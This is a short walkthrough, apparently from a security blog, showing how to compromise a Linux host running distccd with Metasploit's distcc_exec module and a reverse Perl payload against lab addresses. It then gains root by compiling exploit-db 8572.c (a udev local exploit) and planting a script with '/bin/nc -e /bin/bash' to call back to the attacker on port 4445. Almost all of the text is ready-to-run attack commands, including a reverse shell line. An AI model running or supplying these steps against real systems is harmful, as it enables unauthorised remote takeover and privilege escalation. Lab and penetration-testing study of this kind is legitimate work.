Attack Linux DistCC Daemon – This module uses a documented security weakness to execute arbitrary commands on any system running distccd.

This module uses a documented security weakness to execute arbitrary commands on any system running distccd.

Search Exploit

msf5 exploit(unix/misc/distcc_exec) > search distcc
msf5 exploit(unix/misc/distcc_exec) > info
Attack Linux DistCC

Find respective Payload

msf5 exploit(unix/misc/distcc_exec) > show payloads
msf5 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse_perl
Attack Linux DistCC
msf5 exploit(unix/misc/distcc_exec) > set RHOSTS 172.16.74.129
msf5 exploit(unix/misc/distcc_exec) > set LHOST 172.16.74.128
msf5 exploit(unix/misc/distcc_exec) > show options
Attack Linux DistCC
msf5 exploit(unix/misc/distcc_exec) > exploit
Attack Linux DistCC
hostname
ip a
whoami

We Don’t have Root, now what?

Privileged Escalation

gcc /usr/share/exploitdb/exploits/linux/local/8572.c -o /root/PriveEscal
upload /root/PriveEscal /tmp/PriveEscal
echo '#!/bin/bash' > /tmp/run
echo '/bin/nc -e /bin/bash 172.16.74.128 4445' >> /tmp/run
ps -eaf | grep udev | grep -v grep
subtract 1 to your PID
./PriveEscal 2743

https://www.exploit-db.com/exploits/8572

https://www.debian.org/security/2009/dsa-1772

Avatar of RFS

RFS (104)

Metasploit

Tagged in:

, , , , , ,